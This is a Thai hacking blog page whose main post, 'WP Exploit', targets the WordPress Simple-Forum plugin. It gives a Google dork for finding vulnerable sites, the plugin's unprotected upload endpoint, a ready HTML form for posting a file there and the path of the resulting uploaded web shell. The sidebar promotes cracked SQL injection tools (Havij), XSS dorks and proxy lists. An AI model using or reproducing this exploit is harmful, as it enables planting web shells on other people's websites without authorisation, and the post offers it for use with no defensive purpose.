WHO R U

IP Address Checker
Want This

สถิติเว็บไซต์


Free Web Site Counter
DSL Services

Flag Counter

บทความที่ได้รับความนิยม

  • L1/L2/L3 HTTP Proxies List Free Download (3560)
    Checked & filtered with ProxyFire MasterSuite (Timeout 5) L1/L2/L3 HTTP Proxy Servers (3560): 1.179.147.2:8080 1.196.73.237:80...
  • HAVIJ 1.16 PRO PORTABLE FULL VERSION
    Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page...
  • XSS Dorks (Useful)
    XSS Dorks (Useful) Hi, there are some XSS Dorks to found some XSS Vuln sites, copy paste one of the dorks and paste that on google sear...
  • Havij v1.17 Pro Cracked
    Havij 1.17 released We are glad to finally announce the long-awaited release of version 1.17 of Havij Advanced SQL Injection tool...
  • HOT HACKING TOOLS
    HOT HACKING TOOLS  [Hot] HACKING TOOLS FOR ALL [Hot]  Hello everybody! (I'm very sorry if some of them has virus warnin...
  • Hack - Joomla SQL Injections
    .:: Hack - Joomla SQL Injections _____________________________________________________________ 1. Google dork = allinurl:option=com_u...
  • Free tools hack
    http://www.mediafire.com/?o454kp9q44d9h0w http://expatshield.com/ http://www.securitykiss.com/ http://cyberghostvpn.com/ http://uploade...
  • วิธี ดาวน์โหลด วิดีโอจาก YouTube ให้เป็นไฟล์เพลง MP3
    เมื่อคุณกำลังชมวิดีโอบน  YouTube  อยู่ บางครั้งคุณก็อาจจะที่ต้องการเก็บวิดีโอนั้นๆ ให้อยู่ในรูปแบบ  MP3  อาจเพราะด้วยเหตุผลว่า คุณชื่นช...
  • ถึงเพื่อน ๆ ที่อยากเป็น Hacker !!
    โลกเราเองเกิดขึ้นมาไม่รู้กี่ร้อยกี่พันล้านปีมาแล้ว.. อันนั้นไกลเกินไป.. แต่ทุก ๆ ช่วงเวลามีการพัฒนาและมีการเปลี่ยนแปลงตลอดเวลา !! เมื่อเ...

My Motto

Translate

Label

WP Exploit

Posted by Darkoz0Headmx Posted on 21:05

WP Exploit
- Title        : Wordpress Simple-Forum CSRF Vulnerability
- Author       : FathurFreakz
- Google Dork  : inurl:/plugins/simple-forum/
- Exploit      : wp-content/plugins/simple-forum/resources/jscript/ajaxupload/sf-uploader.php
- CSRF Exploit :

<form enctype="multipart/form-data" 

action="http://site.com/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/sf-uploader.php" method="post">

<input type="file" name="url" value="./" /><br />

Please choose a file: <input name="uploadfile" type="file" /><br />

<input type="submit" value="upload" />

</form>


- Shell        : http://www.site.com/wp-content/plugins/simple-forum/resources/jscript/ajaxupload/namashell.php

WP Exploit
ป้ายกำกับ: , , , ,

ข่าวสารอัพเดท

เด็กวิทย์คอม ยินดีต้อนรับเข้าสู่
108-load สังคมแห่งการแบ่งปัน

===============
สถานะ : กำลังอัพเดทเว็ปไซต์

FACEBOOK FANPAGE

HOT-NEWS

CHAT